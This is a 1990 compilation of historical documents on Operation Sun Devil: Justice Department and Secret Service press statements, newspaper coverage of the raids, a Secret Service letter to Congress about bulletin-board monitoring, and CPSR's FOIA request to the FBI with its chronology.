Line 1190: Electronic Frontier Article by John Perry Barlow and Mitchell Kapor
Line 1374: CPSR Expands Civil Liberties Program
Line 1464: EFF Supported Legal Case Summary
Line 1801: The Electronic Frontier and The Bill of Rights
   Source: Electronic Frontier Foundation (EFF)

Line 2036: U.S. Attorney Visits The EPIC Project Online After July 5th
           KPFA Electronic Citizen Broadcast: A Sysop Chat with the Feds

   Source: The EPIC Project

NOTE: Line numbers are approximate
********************************************************************
********************************************************************

                                          U.S. Department of Justice
                                          United States Attorney
                                          District of Arizona
                                          4000 United States Courthouse
                                          Phoenix, Arizona 82505
                                          602-379-3011 /FTS/261-3011


                               PRESS RELEASE


FOR IMMEDIATE RELEASE:          CONTACT: Wendy Harnagel
Wednesday, May 9, 1990                   United States Attorney's Office
                                         (602) 379-3011


PHOENIX--Stephen M. McNamee, United States Attorney for the District of
Arizona, Robert K. Corbin, Attorney General for the state of Arizona, and
Henry R. Potosky, Acting Special Agent in Charge of the United States
Secret Service Office in Phoenix, today announced that approximately
twenty-seven search warrants were executed on Monday and Tuesday, May 7 and
8, 1990, in various cities across the nation by 150 Secret Service agents
along with state and local law enforcement officials. The warrants were
issued as a part of Operation Sundevil, which was a two year investigation
into alleged illegal computer hacking activities.

The United States Secret Service, in cooperation with the United States
Attorney's Office, and the Attorney General for the State of Arizona,
established an operation utilizing sophisticated investigative techniques,
targeting computer hackers who were alleged to have trafficked in and abuse
stolen credit card numbers, unauthorized long distance dialing codes, and
who conduct unauthorized access and damage to computers. While the total
amount of losses cannot be calculated at this time, it is
                                  (MORE)
estimated that the losses may run into the millions of dollars. For
example, the unauthorized accessing of long distance telephone cards have
resulted in uncollectible charges. The same is true of the use of stolen
credit card numbers. Individuals are able to utilize the charge accounts to
purchase items for which no payment is made.

Federal search warrants were executed in the following cities:

               Chicago, IL
               Cincinnati, OH
               Detroit, MI
               Los Angeles, CA
               Miami, FL
               Newark, NJ
               New York, NY
               Phoenix, AZ
               Pittsburgh, PA
               Plano, TX
               Richmond, VA
               San Diego, CA
               San Jose, CA

Unlawful computer hacking imperils the health and welfare of individuals,
corporations and government agencies in the United States who rely on
computers and telephones to communicate.

Technical and expert assistance was provided to the United States Secret
Service by telecommunication companies including Pac Bel, AT&T, Bellcore,
Bell South, MCI, U.S. Sprint, Mid-American, Southwestern Bell, NYNEX, U.S.
West, and by the many corporate victims. All are to be commended for their
efforts in researching intrusions and documenting losses.

McNamee and Corbin expressed concern that the improper and alleged illegal
use of computers may become the White Collar crime of the
                                  (MORE)
1990's. McNamee and Corbin reiterated that the state and federal government
will vigorously pursue criminal violations of statutes under their
jurisdiction. Three individuals were arrested yesterday in other
jurisdictions on collateral or independent state charges. The
investigations surrounding the activities of Operation Sundevil are
continuing.

The investigations are being conducted by agents of the United States
Secret Service and Assistant United States Attorney Tim Holtzen, District
of Arizona, and **Assistant Arizona Attorney General Gail Thackery.

                                 END STORY

**KPFA-FM Panelist


     **************************************************************

           Assistant Director Garry M. Jenkins' Prepared Remarks

                            Operation Sun Devil


Today, the Secret Service is sending a clear message to those computer
hackers who have decided to violate the laws of this nation in the mistaken
belief that they can successfully avoid detection by hiding behind the
relative anonymity of their computer terminals.

In 1984, Congress enacted the Comprehensive Crime Control Act which
prohibits, among other things, credit card fraud and computer fraud. Since
1984, the Secret Service has been aggressively enforcing these laws and has
made over 9,000 arrests nationwide.

Recently we have witnessed an alarming number of young people who, for a
variety of sociological and psychological reasons, have become attached to
their computers and are exploiting thier potential in a criminal manner.
Often, a progression of criminal activity occurs which involves
telecommunications fraud (free long distance phone calls), unauthorized
access to other computers (whether for profit, fascination, ego, or the
intellectual challenge), credit card fraud (cash advances and unauthorized
purchases of goods), and then move on to other destructive activities like
computer viruses.

Some computer abusers form close associations with other people having
similar interests. Underground groups have been formed for the purpose of
exchanging information relevant to their criminal activities. These groups
often communicate with each other through message systems between computers
called "bulletin boards."

Operation Sun Devil was an investigation of potential computer fraud
conducted over a two-year period with the use of sophisticated
investigative techniques.

This investigation exemplifies the commitment and extensive cooperation
between federal, state and local law enforcement agencies and private
governmental industries which have been targeted by computer criminals.

While state and local law enforcement agencies successfully investigate and
prosecute technological crimes in specific geographical locations, federal
intervention is clearly called for when the nature of these crimes becomes
interstate and international.

                                 (PAGE 1)

On May 8, 1990, over 150 Special Agents of the United States Secret
Service, teamed with numerous local and state law enforcement agencies,
served over two dozen search warrants in approximately fifteen (15) cities
across this nation.

Several arrests and searches were made during the investigation to protect
the public from impending dangers. In one situation, computer equipment
was seized after unauthorized invasion into a hospital computer.

Our experience shows that many computer hacker suspects are no longer
misguide teenagers mischievously playing games with their computers in
their bedrooms.  Some are now high tech computer operators using computers
to engage in unlawful conduct.

The losses to the american public in this case are expected to be
significant.  The Secret Service takes computer crime very seriously, and
we will continue to investigate aggressively those crimes which threaten
our nation's businesses and government services.

                               END
  ***************************************************************

                  OPERATION SUN DEVIL NEWS ARTICLES

            Probe Focuses on Entry, Theft by Computers
           (From: CHICAGO TRIBUNE, May 10, 1990: p. I-6)


PHOENIX--An interstate probe of computer invasions has uncovered losses
that may reach millions of dollars and could be "just the tip of the
iceberg," federal law enforcement officials said Wednesday.

The investigation is focused on illegal entry into computer systems and
unauthorized use of credit-card numbers and long-distance codes, said Garry
Jenkins, assistant Secret Service director for investigations.

No arrests for computer crime resulted, however, when 27 search warrants
were served in 12 cities, including Chicago, by 150 Secret Service agents
and police on Tuesday, officials said.

In Chicago, federal agents seized computers and information disks at a
business and a private home, said Tim McCarthey, chief of the Secret
Service's criminal enforcement division in Chicago.  Nationwide, some 40
computers and 23,000 disks of computer information were seized.

Secret Service officials declined to release an specifics, including the
number of people targeted, saying the two-year investigation, code-named
"Operation Sun Devil," is continuing.

"The losses that we estimate on this may run to the millions of dollars,"
said Stephen McNamee, U.S. Atty. for Arizona.

Much of the alleged loss stems from unpaid telephone and computer access
charges, officials said.

They said it was possible that computer hackers had obtained goods or cash
through use of unauthorized credit cards, but could not cite any instance
of it.

In addition to misuse of credit cards and phone lines the hackers are
believed to have gained access to computers that store medical and
financial histories, officials said.

Under new computer crime laws, the Secret Service has jurisdiction to
investigate allegations of electronic fraud through the use of access
devices such as credit-card numbers and long-distance codes.

Defendants convicted of unauthorized use of such devices can be sentenced
up to 10 years in prison if they commit fraud of more than $,100.

A similar investigation supervised by federal prosecutors in Chicago has
resulted in several indictments.
********************************************************************

AT&T NEWS BRIEFS via Consultant's Liason Program

Wednesday, May 9, 1990

HACKER WHACKER -- The Secret Service is conducting a coast-to-coast
investigation into the unauthorized use of credit-card numbers and
long-distance dialing as well as illegal entry into computer systems

by hackers, according to sources. ... AP ...  Authorities fanned out
with search warrants in fourteen cities Tuesday in an investigation of
a large nationwide computer hacker operation.  Officials of the Secret
Service, U.S. Attorney's Office and Arizona Attorney General's office
scheduled a news conference Wednesday to release details of the
operation.

UPI, 5/8 ... A Long Island [NY] teen, caught up in [the investigation],
dubbed Operation Sun Devil, has been charged ...  with computer
tampering and computer trespass.  State Police, who said [Daniel
Brennan, 17], was apparently trying to set up a surreptitious
messaging system using the [computer system of a Massachusetts firm]
and 800 numbers, raided his home Monday along with security officials
of AT&T. ... [A State Police official] said that in tracing phone
calls made by Brennan ... AT&T security people found that he was
regularly calling one of the prime targets of the Sun Devil probe, a
... hacker who goes by the handle "Acid Phreak."  ... New York
Newsday, p. 31.
****************************************************************************
>EXCERPTED From The Detroit News, Thursday, May 10, 1990, Section B, p.1:

FEDS PULL PLUG ON HACKERS
Computer-fraud raid hits two homes in Michigan

By Joel J. Smith, Detroit News Staff Writer

Secret Service agents got a big surprise when they raided a Jackson-area
home as part of an investigation of a nationwide computer credit card and
telephone fraud scheme.  They found a manual that details how almost
anybody can use a computer to steal.  It also describes how to avoid
detection by federal agents.  On Wednesday, James G. Huse, Jr., special
agent in charge of the Secret Service office in Detroit, said the manual
was discovered when his agents and Michigan State Police detectives broke
into a home in Clark Lake, near Jackson, on Tuesday.  Agents, who also
raided a home in Temperance, Mich., near the Ohio border, confiscated
thousands of dollars in computer equipment suspected of being used by
computer buffs -- known as hackers -- in the scheme.

The raids were part of a national computer fraud investigation called
Operation Sundevil in which 150 agents simultaneously executed 28 search
warrants in 16 U.S. cities.  Forty-two computer systems and 23,000 computer
disks were seized across the country.  The nationwide network reportedly
has bilked phone companies of $50 million.  Huse said the Secret Service
has evidence that computers in both of the Michigan homes were used to
obtain merchandise with illegally obtained credit card numbers.  He said
long-distance telephone calls from the homes also were billed to
unsuspecting third parties.

There were no arrests, because it was not known exactly who was using the
computers at the homes.  Huse also said there was no evidence that the
suspects were working together.  Rather, they probably were sharing
information someone had put into a national computer "bulletin board".

*****************************************************************************
                "Computer Hacker Ring with a Bay Area Link"
            (From: San Francisco Chronical, May 9, 1990: A-30)

The Secret Service yesterday searched as many as 29 locations in 13 cities,
including the family home of an 18-year-old San Jose State University
student, in an investigation of alleged fraud by computer hackers, law
enforcement sources said.

The 6 a.m. search on Balderstone Drive in San Jose sought computer
equipment allegedly used to "deal in pirate software and electronic fraud,"
San Jose police Seargeant Richard Saito said in a prepared statement.

The nationwide investigation, code-named "Operation Sun Devil," concerns
the unauthorized use of credit card numbers and long-distance dialing codes
as well as illegal entry into computer systems by hackers, said sources.

Saito said the probe centered on the "Billionaire Boys Cub computer
bulletin board" based in Phoenix. A press conference on the probe is
scheduled today in Phoenix.

The investigation in Phoenix is also focusing on incidents in which
copmputer hackers allegedly changed computerized records at hospitals and
police 911-emergency lines, according to one source.

The San Jose suspect was identified as Frank Fazzio Jr., whom neighors said
was a graduate of Pioneer High School and lives at home with his younger
sister and parents. Neither he nor his family could be reached for comment.

"I've never thought him capable of that sort of thing," said one neighbor
in the block-long stret located in the Almaden Valley section of south San
Jose.

Warrants were obtained by the Secret Service to conduct the search in San
Jose, as well as in Chicago; Cincinnati; Detroit; Los Angeles; Miami;
Newark, N.J.; New York City; Pittsburgh; Richmond, Va.; Plano Texas; and
San Diego.

Under new computer crime laws, the Secret Service has jurisdiction to
investigate allegations of electronic fraud through the use of access
devices such as credit card numbers and codes that long-distance companies
issue to indivdual callers.  Defendants convicted of unauthorized use of
such "access devaices" can be sentenced to 10 years in prison if they
commit fraud of more than $1,000.

                               END
         *************************************************

 
 ======================================================================

 From Marc Rotenberg of Computer Professionals for Social Responsibility
 Fri, Jun 15, '90      266 lines

 
 Here is a letter from the Director of the Secret Service to Don Edwards in
 response to questions raised by Edwards' Subcommittee. It is quite long as are
 the postings which follow it.  
 
 [This letter follows from a FOIA request sent by CPSR to the FBI in 
  August, 1989]      
               ------------------------------------------
 
                                         DEPARTMENT OF TREASURY
                                         UNITED STATES SECRET SERVICE
                                          WASHINGTON, DC 20223
                                         APR 30 1990 
 
 The Honorable Don Edwards
 Chairman
 Subcommittee on Civil and Constitutional Rights
 Committee on the Judiciary
 House of Representatives
 Washington,  D.C.  20515
 
 Dear Mr. Chairman:
 
 Thank you for your letter of April 3, 1990, concerning your 
 committee's interest in computer fraud.  We welcome the 
 opportunity to discuss this issue with your committee and I 
 hope the following responses adequately answer your 
 questions.
                                            
 Question 1:
 
 Please describe the  Secret Service's process for investigating 
 computer related crimes under Title 18, United States Code, 
 Section 1030 and any other related statutes.
 
 Response:
 
 The process by which the  Secret Service investigates 
 computer related crimes is similar to the methods we use to 
 investigate other types of criminal investigations.  Most of the 
 investigative techniques are the  same; surveillances, record 
 checks, witness and suspect interviews, etc.  the primary 
 difference is we had to develop resources to assist in the 
 collection and review of computer evidence.
 
 To provide  our agents with this expertise, the secret service 
 developed a computer fraud investigation course which, as of 
 this date, has trained approximately 150 agents in the proper  
 methods for conducting a computer fraud investigation.  
 Additionally, we established a computer  Diagnostics center, 
 staffed  with computer professional, to review evidence on 
 computer  systems.
 
 Referrals of computer related criminal investigations occur in 
 much the same manner as any other case.  A victim sustains a 
 loss and reports the crime, or, a computer related crime is 
 discovered during the course of another investigation.
 
 In the investigations  we do select, it is not our intention to 
 attempt to supplant local or state law enforcement.  We 
 provide enforcement in those cases that are interstate or 
 international in nature and for one reason or another are 
 beyond the capability of state and local law enforcement 
 agencies.
 
 When computer related crimes are referred by the various 
 affected industries to the local field offices, the Special 
 Agent in  Charge (SAIC) determines which cases will be 
 investigated based on a variety of criteria.  Each SAIC must 
 consider the economic impact of each case, the prosecutive 
 guidelines of the United States Attorney, and the investigative 
 resources available in the office to investigate the case .
                                               
 In response to the other portion of your question, the other 
 primary statute we use to investigate computer related crimes 
 is Title 18, United States  Code,  Section 1029 ( Access Device 
 Fraud).  This service  has primary jurisdiction in those cases 
 which are initiated outside a bank and do not involve  
 organized crime, terrorism, or foreign counterintelligence 
 (traditional responsibilities of the FBI).
 
 The term "access device" encompasses credit cards, debit 
 cards, automatic teller machines (ATM) cards, personal 
 identification numbers (PIN's) used to activate ATM machines, 
 credit or debit card account numbers, long distance telephone 
 access codes, computer passwords and logon sequences, and 
 among other things the computer chips in cellular car phones 
 which assign billing.
 
 Additionally, this Service has primary jurisdiction in cases 
 involving electronic fund transfers by consumer (individuals) 
 under Title 15, U. S. code, section 169n (Electronic Fund 
 Transfer Act).  This could involve any scheme designed to 
 defraud EFT systems used by the public, such as pay by phone 
 systems, home banking, direct deposit, automatic payments, 
 and violations concerning automatic teller machines.  If the 
 violations can be construed to be a violation of the  banking 
 laws by bank employee, the FBI would have primary 
 jurisdiction.  
 
 There are many other statutes which have been used to 
 prosecute computer criminals but it is within the purview of 
 the U.S. Attorney to determine which statute will be used to 
 prosecute an individual.
 
 Question 2:
 
 Has the Secret  Service ever monitored any computer bulletin 
 boards or networks?  Please describe  the procedures for 
 initiating such monitoring, and list those computer bulletin 
 boards or networks monitored by the Secret  Service since 
 January 1988.
 
 Response:
 
 Yes, we have occasionally monitored computer bulletin boards.  
 The monitoring occurred after we received complaints 
 concerning criminal activity on a particular computer bulletin 
 board.  The computer bulletin boards were monitored as part of 
 an official investigation and in accordance with the directives 
 of the Electronic Communications  Privacy  Act of 1986 (Title 
 18 USC 2510)
 
 The procedures used to monitor computer bulletin boards 
 during an official investigation have involved either the use of 
 an informant (under the direct supervision of the investigating 
 agent)  or an agent operating in an undercover capacity.  In 
 either case, the informant or agent had received authorization 
 from the computer bulletin board's owner/operator to access 
 the system.
 
 We do not keep records of the bulletin boards which we have 
 monitored but can provide information concerning a particular 
 board if we are given the name of the board.
 
 Question 3:
 
 Has the Secret Service or someone acting its direction ever 
 opened an account on a computer bulletin board or network?  
 Please describe the procedures for opening such an account and 
 list those bulletin boards or networks on which such accounts 
 have been opened since January 1988.
 
 Response:
 
 Yes, the U.S.  Secret Service has on many occasions, during the 
 course of a criminal investigation, opened accounts on 
 computer bulletin boards or networks.
 
 The procedure for opening an account involves asking the 
 system administrator/operator for permission to access to the 
 system.  Generally, the system administrator/operator will 
 grant everyone immediate access to the computer bulletin 
 board but only for lower level of the system.  The common 
 "pirate" computer bulletin boards associated with most of 
 computer crimes have many different level in their systems.  
 The first level is generally available to the public and does not 
 contain any information relation to criminal activity.  Only 
 after a person has demonstrated unique computer skills, been 
 referred by a known "hacker," or provided stolen long-distance 
 telephone access codes or stolen credit card account 
 information,  will the system administrator/operator permit a 
 person to access the higher levels of the bulletin board system 
 which contains the information on the criminal activity.
 
 As previously reported in our answer for Question 2, we do not 
 keep records of the computer bulletin boards on which we have 
 established accounts.
 
 Question 4:
 
 Has the Secret Service or someone acting under its direction 
 ever created a computer bulletin board or network that was 
 offered to the public?  Please describe any such bulletin board 
 or networks.
 
 Response:
 
 No, the U. S. Secret Service has not created a computer bulletin 
 board nor a network which was offered to members of the 
 public.   We have created an undercover bulletin board which 
 was offered to a select number of individuals who had 
 demonstrated an interest in conducting criminal activities.  
 This was done with the guidance of the U.S. Attorney's  office 
 and was consistent with the Electronic Communications 
 Privacy Act.
 
 Question 5:
 
 Has the Secret Service ever collected, reviewed or 
 "downloaded" transmissions or information from any computer 
 network or bulletin board?  What procedures does the Secret 
 Service have for obtaining information from computer bulletin 
 boards or networks?  Please list the occasions where 
 information has been obtained since January 1988, including 
 the identity of the bulletin boards or networks,  the type of 
 information obtained,   and how that information was obtained 
 (was it downloaded, for example).
 
 Response:
 
 Yes, during the course of several investigations, the U. S.  
 Secret Service has "down loaded" information from computer 
 bulletin boards.  A review of information gained in this manner 
 (in an undercover capacity after being granted access to the 
 system by it's system administrator)  is performed in order to 
 determine whether or not that bulletin board is being used to 
 traffic in unauthorized access codes or to gather other 
 information of a criminal intelligence nature.  At all times, 
 our methods are in keeping with the procedures as outlined in 
 the Electronic Communications Privacy Act (ECPA).
 
 If a commercial network was suspected of containing 
 information concerning a criminal activity, we would obtain 
 the proper court order to obtain this information in keeping 
 with the ECPA.
 
 The U. S. Secret Service does not maintain a record  of the 
 bulletin boards we have accessed.
 
 Question 6:
 
 Does the Secret Service employ, or is it considering employing, 
 any system or program that could automatically review the 
 contents of a computer file, scan the file for key items, 
 phrases or data elements, and flag them or recommend further 
 investigative action?  If so, what is the status of any such 
 system.  Please describe this system and research being 
 conducted to develop it.
 
 Response:
 
 The Secret  Service has pioneered the concept of a Computer  
 Diagnostic Center (CDC)  to facilitate the review and 
 evaluation of electronically stored information.  To streamline 
 the tedious task of reviewing thousands of files per 
 investigation, we have gathered both hardware and software 
 tools to assist our search of files for specific information or 
 characteristics.  Almost all of these products are 
 commercially  developed products and are available to the 
 public.  It is conceivable that an artificial intelligence process 
 may someday be developed and have application to this law 
 enforcement function but we are unaware if such a system is 
 being developed.
 
 The process of evaluating the information and making 
 recommendations for further investigative action is currently 
 a manual one at our CDC.  We process thousands of computer 
 disks annually as well as review evidence contained in other 
 types of storage devices (tapes, hard drives, etc.).   We are 
 constantly seeking  ways to enhance our investigative mission.  
 The development of high tech resources like the CDC saved 
 investigative manhours and assist in the detection  of criminal 
 activity.
 
 Again, thank you for your interest.  Should you have any further 
 questions, we will be happy to address them. 
 
                                                 Sincerely, 
                                                 /s/
                                                 John R.  Simpson, Director
 
 cc: Honorable Charles E.  Schumer 
 
 =============================================================================

 
 For those of you who have considered submitting an FOIA information request,
 Marc submits the following cautionary tale:   
 
 
 On August 18, 1989 CPSR submitted a Freedom of Information Act request to the
 FBI asking for information about BBS surveillance.  After four follow-up
 letters, a series of phone calls, and Congressional testimony that discussed
 the CPSR request, the FBI has failed to respond to our request.  (The
 statutory
 time limit for the FOIA is ten days).
 
 If any one has information about possible FBI surveillance of bulletin boards
 or networks, please send it to me. Specific dates, locations, BBSs are
 important.  (You can send information to me
 anonymously by land mail, if you need to protect your identity).

 Thanks for your assistance,                   
 
 Marc Rotenberg, Director
 CPSR Washington Office
 1025 Connecticut Ave., NW, Suite 1015
 Washington, DC 20036
 202/775-1588 (voice)
 202/775-1941 (Data)
 rotenberg@csli.stanford.edu or
 cdp!mrotenberg@arisia.xerox.com
 
           ---------------------------------------
 
    [CPSR FOIA Request to the FBI Regarding BBS Surveillance]


 CPSR Washington Office
 1025 Connecticut Avenue, NW
 Suite 1015
 Washington, DC  20036                         
 202 775-1588
 202 775-1941 (fax)
 
 Director
 Marc Rotenberg
                                                 August 18, 1989
 FOIA Officer
 FBI
 9th St. & Penn. Ave., NW
 Washington, DC  20535
 Dear FOIA Officer,
         This is a request under the Freedom of Information Act, 5 U.S.C. 552.
 
 Part I:       I write to request a copy of all materials relating to the FBI's
 collecf information from computer networks and bulletin boards, such as
 PeaceNet (San Francisco CA) or The Well (Berkeley CA), that are used
 frequently by political or advocacy organizations.  In particular, I would
 like any records which would indicate whether the Bureau is intercepting,
 collecting, reviewing, or "downloading" computer transmissions from any of the
 following networks and conferences: Action Southern Africa, AIDS Coalition
 Network, The American Peace Test, Amnesty International, Association for
 Progressive Communications, Beyond Containment, Center for Innovative
 Diplomacy, Central America Resource Center, Central America Resource Network
 (CARNet), The Christic Institute, Citizen Diplomacy, Community Data
 Processing, EcoNet, Friends of the Earth, Friends Committee on National
 Legislation, HandsNet, Institute for Peace and International Security, Media
 Alliance, Meiklejohn Civil Liberties Institute, National Execution Alert
 Network, Palo Alto Friends Peace and Social Action Committee, PeaceNet. Quaker
 Electronic Project, Web, The Well.
 
    This request includes public communications that take place through a
 bulletin board.  For example, this would include both transmissions that are
 available for public perusal, a "conference" or "posting," as well as
 transmissions that are directed from one party to one or more other specific
 parties and intended as private, "electronic mail."
 
 Part II:         I also request any records that would indicate whether the
 FBI, or anyoe acting at the behest or direction of the FBI, has any computer
 accounts on any computer bulletin boards operated by an advocacy or political
 organization, and, if so, the names of the bulletin boards, and whether the
 Bureau has indicated the actual organizational affiliation of the account
 holders to the system operators.
 
 Part III:         I also request any records that would indicate whether the
 Bureau has er operated, is currently operating, is involved in the operation
 of, or is planning to operate, a computer bulletin board that is intended for
 public use.
 
 Part IV:         I would also like any records which would indicate the
 circumstances unr which it would be appropriate for an agent or authorized
 representative, asset, informant, or source of the Bureau to intercept,
 collect, review, or "download" the contents of computer bulletin boards.
 
 Part V:         I would like any records relating to the FBI's development,
 research, or assessment of computer systems for automated review of
 information stored in an electronic format, obtained from a computer bulletin
 board or network.  
 
 Part VI:         Finally, I request any records that would indicate whether
 the FBI has developed, or is planning to develop, a system that could
 automatically review the contents of a computer file, scan the file for key
 terms or phrases, and then recommend the initiation of an investigation based
 upon this review.
 

 I ask that you check with your regional offices in San Francisco, San Jose,
 Austin, Phoenix, Los Angeles, and New York, in addition to the files that are
 available in Washington, DC.  I also ask that you consult with those agents
 involved in the investigation of computer crime to determine whether they
 might be aware of the existence of such records.  You should also check any
 documents relating to John Maxfield, who was employed by the Bureau to
 investigate computer bulletin boards.
 
  Under the Freedom of Information Act, you may withhold all properly exed
 materials.  However, you must disclose all non-exempt portions that are
 reasonably segregable.  I reserve the right to appeal the withholding or
 deletion of any information.
 
  Under the Freedom of Information Act, CPSR is entitled to a waiver of as for
 this request because the "disclosure of this information is likely to
 contribute significantly to the public understanding of the operations or
 activities of the government and is not primarily in the commercial interest
 of the requester."  CPSR is a non-profit, educational organization of computer
 scientists. Our work has been cited in scholarly journals, trade publications,
 and the national media. CPSR has particular expertise on the use of computer
 technology by the FBI, having prepared an extensive report on the proposed
 expansion of the NCIC at the request of Congressman Don Edwards.  For these
 reasons, CPSR is entitled to a waiver of all fees.
 
  If you have any questions regarding this request, please telephone me ae
 above number. I will make all reasonable efforts to narrow the request if you
 determine that it has been too broadly framed.
 
  As provided in the Freedom of Information Act, I will expect to receivea
 response within ten working days. 
                                                 Sincerely yours,
 
 
                                                 Marc Rotenberg, Director
                                                 Washington Offfice,
                                                 Computer Professionals
                                                 for Social Responsibility

              *************************************** 
 
 [CPSR letter to Congressman Don Edwards regarding FOIA request]
 
  
                                               
                                                         February 27, 1990
 Representative Don Edwards
 Subcommittee on Civil and 
 Constitutional Rights
 House Judiciary Committee
 806 House Annex 1
 Washington, DC  20515
 
 Dear Chairman Edwards:
         I am writing to you about a particular FOIA request that CPSR 
 has pursued since August of last year.  We asked the FBI for 
 information about the monitoring of computer networks and bulletin 
 boards.  We initiated this request because of the obvious civil 
 liberties interests -- speech, associational, and privacy -- that 
 would be endangered if the FBI's examination of the contents of 
 computer systems failed to satisfy appropriate procedural 
 safeguards.

         After six months of delay, five certified letters to the 
 Bureau's FOIA/Privacy Act office, and many phone calls with the 
 FBI's FOIA officers, we have not received even a partial response to 
 our request.  
         On September 20, 1989 a FOIA officer at the FBI assured us
 that information would be forthcoming "in a couple of weeks."  A 
 letter from the FBI FOIA/PA office on December 22 indicated that 
 information responsive to our request "has been located and will be 
 assigned for processing soon."  But when I spoke with a FBI FOIA 
 Officer on February 15, less than two weeks ago, I was told that 
 they "haven't even started" to process the request and that the FBI 
 couldn't say when we would receive a response.  (Please see 
 enclosed chronology and attachments).

         The need for this information is truly urgent.  Further delay 
 will constitute a denial.  Congress is now considering several 
 computer crime bills, such as H.R. 55 and H.R. 287, that could 
 broaden the authority of federal agents to examine the contents of 
 computer systems across the country.  There is a good chance that a 
 bill will pass before the end of this session.     

         Before opening the door to new forms of criminal 
 investigation, Congress and the public should have a complete 
 picture of the FBI's current practices.  Computer communications are 
 particularly vulnerable to surveillance and routine monitoring.  
 Computer mail unrelated to a particularized investigation could be 
 swept up in the government's electronic dragnet if the law is not 
 carefully tailored to a well defined purpose.  Without a clear 
 understanding of the civil liberties problems associated with the 
 investigation of computer crime, Congress may be exacerbating a 
 problem it does not yet fully know about.

         CPSR's Freedom of Information Act request could provide 
 answers to these questions.  The FOIA establishes a presumption 
 that the activities of government should be open to public review 
 and that agency records should be disclosed upon request.  But the 
 Bureau failed to comply with the statutory requirements of the FOIA 
 and frustrated our effort to obtain information that should be 
 disclosed.  Without this information computer users, the public, and 
 the Congress, may be unable to assess whether the Bureau's current 
 activities conform to appropriate procedural safeguards.

         Computer crime is a serious problem in the United States.  One 
 auditing firm places the annual loss between $3 billion and $5 
 billion.  Nonetheless, it is necessary to ensure that new criminal 
 law does not undermine the civil liberties of computer users across 
 the country.  We requested information from the FBI under the FOIA 
 to help assess the adequacy of current safeguards.  The Bureau failed 
 to respond.  The result is that the public is left in the dark at a time 
 when significant legislation is pending.        

         We would appreciate whatever assistance with this request 
 you might be able to provide.  

                                                         Sincerely yours,
 
 
 
                                                         Marc Rotenberg,
                                                         Director
                                                         CPSR Washington
                                                         Office
 
 
 Enclosure 
         Chronology of CPSR's FOIA Request regarding
         FBI Monitoring of Computer Networks with attachments
 
 cc:     Representative Charles Schumer
         Representative Wally Herger
 
         FBI FOIA/PA Office

            ********************************************
 
                   [Chronology of events]
 
                                 
         CPSR FOIA Request 
 
 FBI Monitoring of Computer Networks
 
 CHRONOLOGY
 
 
         Aug. 18, 1989   
 
 CPSR sends FOIA request to FBI seeking agency 
 records regarding the FBI's monitoring of computer 
 networks and computer bulletin boards used by 
 political and advocacy organizations.  The FOIA 
 request seeks information about: 
                 
 %       the FBI's surveillance of computer bulletin 
 boards and networks used by political 
 organizations;
 
 %       the FBI's creation of clandestine accounts on 
 computer bulletin boards and networks operated 
 by  political organizations;
 
 %       the FBI's creation of secret accounts on public 
 bulletin boards;
 
 %       the FBI's procedures regarding the downloading 
 of information contained on a computer bulletin 
 board;
 
 %       the FBI's research on the automated review of 
 the contents of information contained on 
 computer bulletin board and networks; and 
 
 %       the FBI's research on the  automation of the 
 decision to initiate a criminal investigation, 
 based on the contents of a computer 
 communication.
                 
   The letter requests a fee waiver based on the 
 public interest standard.  The letter  indicates that 
 CPSR has particular expertise in the evaluation of 
 the civil liberties implications of law enforcement 
 computer systems, having completed an extensive 
 report for the House Judiciary Committee on the 
 proposed expansion of the FBI's computer system, 
 the NCIC.  The letter further states that CPSR 
 would work with the FOIA/PA office to facilitate 
 the processing of the request. 
 
         Aug. 31, 1989   
 
 FBI response #1.  FBI sends a letter to CPSR 
 acknowledging receipt of the FOIA request and 
 designating the request "FBI's Computer Networks 
 and Bulletin Board Collection," request no. 319512.
 
         Sept. 20, 1989  
 
 CPSR speaks with FOIA Officer Keith Gehle 
 regarding status of request.  Mr. Gehle states that 
 he can not send a response "until he receives 
 responses from various agencies."  It is "difficult 
 to go to computing indices."  He says that he 
 expects to have information "in a couple of 
 weeks,"and will have a response "by October 5, at 
 the latest."
 
         Oct. 16, 1990   
 
 CPSR Follow-up letter #1.  CPSR confirms 
 conversation with Mr. Gehle regarding  Oct. 5 target 
 date and asks FOIA Officer to call to indicate the 
 status of the FBI's response to the request.  
 
         Oct. 26, 1989   
 
 CPSR speaks with Mr. Gehle.  He says, "we are 
 working on your request."  "We should have 
 something soon.  Hate to give a specific date, but 
 should have a letter for you within two weeks."
 
         Nov. 22, 1989   
 
 CPSR follow-up letter #2.  CPSR writes to Mr. 
 Gehle, notes that Mr. Gehle said he was working on 
 the request, and the that response should have been 
 sent by Nov. 9.  CPSR requests that FOIA officer 
 call CPSR by Dec. 1 to indicate the status of the 
 request.  
 
         Dec. 22, 1989   
 
 FBI response #2.  FBI sends letter, 
 acknowledging receipt of Oct. 16 and Nov. 22 
 letters.  The letter states that "[i]nformation which 
 may be responsive to your request has been located 
 and will be assigned for processing soon." The 
 letter indicates that the FOIA/PA office receives a 
 large number of requests and that delays are likely.
 
         Jan. 9 , 1990   
 
 CPSR follow-up letter #3.  CPSR writes to Mr. 
 Moschella, chief of the FOIA/PA office at the FBI, 
 acknowledges Dec. 22 letter and location of 
 responsive information.  Requests that records be 
 sent by Feb 18, 1990.                         
 
         Jan. 19, 1990   
 
 FBI response #3.  FBI sends letter stating that 
 the Bureau has allocated many agents to FOIA 
 processing, that a large number of requests are 
 received.  The letter further states that "a delay of 
 several months or more may be anticipated before 
 your request is handled in turn."
 
         Feb. 2, 1990    
 
 CPSR follow-up letter #4.  CPSR writes to Mr. 
 Moschella, acknowledges Jan. 19, expresses 
 concern about delay.  Letter notes that CPSR was 
 assured by a FOIA officer in the fall that "request 
 would be answered within 'a couple of weeks.'" 
 
         Feb. 15, 1990   
 
 CPSR receives call from Mr. Boutwell.  According to 
 Mr. Boutwell, FBI can't say when request will be 
 processed. "Haven't even started.  Backlogs and lay-
 offs during past year . . ."  CPSR: FOIA Officer 
 indicated information had been located. FBI: Too 
 optimistic. "Request not yet assigned to an analyst 
 . . .   working now on 1988 requests . . . Litigation is 
 taking up time . . .  analyst is taking time away 
 from document review for  litigation . . .  increased 
 requests, fewer personnel, lots of other factors.   
 Would expedite for life and death or due process, 
 pursuant to agency regulations." CPSR: so when do 
 we receive a response?  FBI: "Can't say."
 
=============================================================================

  Sun Devil gives birth to the Electronic Frontier Foundation

 
THE ELECTRONIC FRONTIER FOUNDATION
One Cambridge Center, Suite 300
Cambridge, MA       02142
617/577-1385
617/225-2347 fax
eff@well.sf.ca.us


     
FOR IMMEDIATE RELEASE

Contact: Cathy Cook (415) 759-5578
 
